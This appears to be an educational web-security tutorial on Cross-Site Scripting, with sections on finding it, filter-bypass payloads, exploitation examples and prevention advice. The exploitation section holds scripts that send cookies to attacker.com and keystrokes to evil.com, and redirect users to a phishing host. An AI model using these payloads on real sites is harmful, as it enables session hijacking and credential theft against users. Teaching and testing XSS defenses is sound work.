Cross-Site Scripting (XSS) is one of the most common and dangerous vulnerabilities found in web applications. It allows attackers to inject malicious scripts into web pages viewed by other users, potentially leading to session hijacking, defacement, or redirection to malicious sites. In this article, we will explore what XSS is, how to find it, and how attackers may exploit it — all for educational and ethical hacking purposes only.

What is XSS (Cross-Site Scripting)?

XSS stands for Cross-Site Scripting, a type of injection attack where malicious scripts are injected into otherwise trusted websites. These scripts are typically executed in the browsers of unsuspecting users.

There are three main types of XSS:

  1. Stored XSS – The malicious script is permanently stored on the target server (e.g., in a database).

  2. Reflected XSS – The script is reflected off a web server, such as in an error message or search result.

  3. DOM-based XSS – The vulnerability exists in client-side code rather than server-side.

Tools Needed to Find XSS Vulnerabilities

Before you start hunting for XSS bugs, you’ll need some tools in your arsenal:

  • Web browser (e.g., Firefox, Chrome)

  • Developer tools (built into the browser)

  • Burp Suite – for intercepting and modifying HTTP requests

  • XSS Hunter / XSStrike / DalFox – tools specifically designed for XSS testing

  • Kali Linux – includes many pre-installed security tools

Step-by-Step Guide: How to Find XSS Vulnerabilities

1. Identify User Input Fields

Start by browsing through the website and looking for areas where user input is accepted:

  • Search bars

  • Contact forms

  • Comment sections

  • URL parameters

  • Login forms

These inputs are prime targets for XSS testing.

2. Send a Basic XSS Payload

Test simple payloads to check for basic reflections or executions:

html

<script>alert('XSS')</script>

Or a smaller version:

html

"><script>alert(1)</script>

Insert this payload into the input fields or URL parameters. If a pop-up appears, it's likely an XSS vulnerability.

3. Check HTML Context

Sometimes the input is embedded in different contexts such as:

  • HTML body

  • JavaScript

  • Attributes (e.g., src, href, onerror)

  • Comments

Depending on where your input ends up, you’ll need to craft a specific payload. For example:

  • In img tag:

html

"><img src=x onerror=alert(1)>

  • In a JavaScript string:

html

';alert(1);//

4. Use Browser Developer Tools

Right-click on the web page and select Inspect Element. Look at the HTML code and see where your input ends up. This helps tailor your payload to match the output context.

5. Intercept Requests Using Burp Suite

Sometimes, what you type in the input field is sanitized before reaching the server. Use Burp Suite to:

  • Capture and edit requests

  • Insert payloads directly

  • Bypass client-side validation

Look at the HTTP request and manually inject your XSS payload into parameters.

Advanced XSS Payloads

Here are more advanced payloads to bypass filters:

  • HTML Entity Encoding:

html

&lt;script&gt;alert(1)&lt;/script&gt;

  • Unicode Encoding:

html

\u003Cscript\u003Ealert(1)\u003C/script\u003E

  • Event Handlers:

html

<a href="#" onclick="alert(1)">Click me</a>

  • JavaScript URI:

html

<a href="javascript:alert(1)">Click</a>

  • Data URI:

html

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>

How Hackers Exploit XSS Vulnerabilities

Once a vulnerability is found, attackers may:

1. Steal Cookies / Sessions

If cookies are not marked as HTTP-only, attackers can steal them:

html

<script>fetch('http://attacker.com?c='+document.cookie)</script>

2. Phishing Attacks

Redirect users to a malicious page:

html

<script>window.location='http://evil.com'</script>

3. Keylogging

Capture user keystrokes:

html

<script>
document.onkeypress = function(e) {
  fetch('http://evil.com/log?key='+e.key);
}
</script>

4. Browser Exploits

Some advanced attacks use XSS to exploit browser bugs or install malware via social engineering.

Real-World XSS Examples

Example 1: Reflected XSS

A search page includes user input in the results:

php-template

https://example.com/search?q=<script>alert(1)</script>

Example 2: Stored XSS

A blog allows users to post comments. An attacker posts:

html

<script>alert('Stored XSS')</script>

Every time someone views the comment, the script executes.

Example 3: DOM-based XSS

JavaScript code uses user input without sanitization:

js

document.write(location.hash);

A URL like this triggers XSS:

php-template

https://example.com/#<script>alert(1)</script>

How to Prevent XSS

From a developer’s perspective, here’s how to mitigate XSS risks:

  1. Escape all output – Encode user input before rendering.

  2. Use Content Security Policy (CSP) – Restrict which scripts can run.

  3. HTTP-only cookies – Prevent access to cookies via JavaScript.

  4. Sanitize input – Use libraries like DOMPurify for user-generated HTML.

  5. Avoid innerHTML – Use safer DOM manipulation methods like textContent.

Legal Warning

Important: This article is for educational purposes only. Testing XSS vulnerabilities on websites without permission is illegal and unethical. Always get authorization or use intentionally vulnerable apps like:

  • DVWA (Damn Vulnerable Web App)

  • bWAPP (Buggy Web App)

  • OWASP Juice Shop

Conclusion

XSS vulnerabilities are widespread and can have serious security consequences. Whether you're a bug bounty hunter, penetration tester, or web developer, understanding how to find and exploit (ethically) these flaws is essential. Always practice responsible disclosure and work to secure applications against malicious exploitation.

By learning how XSS works and how to test for it, you can contribute to building a safer web for everyone.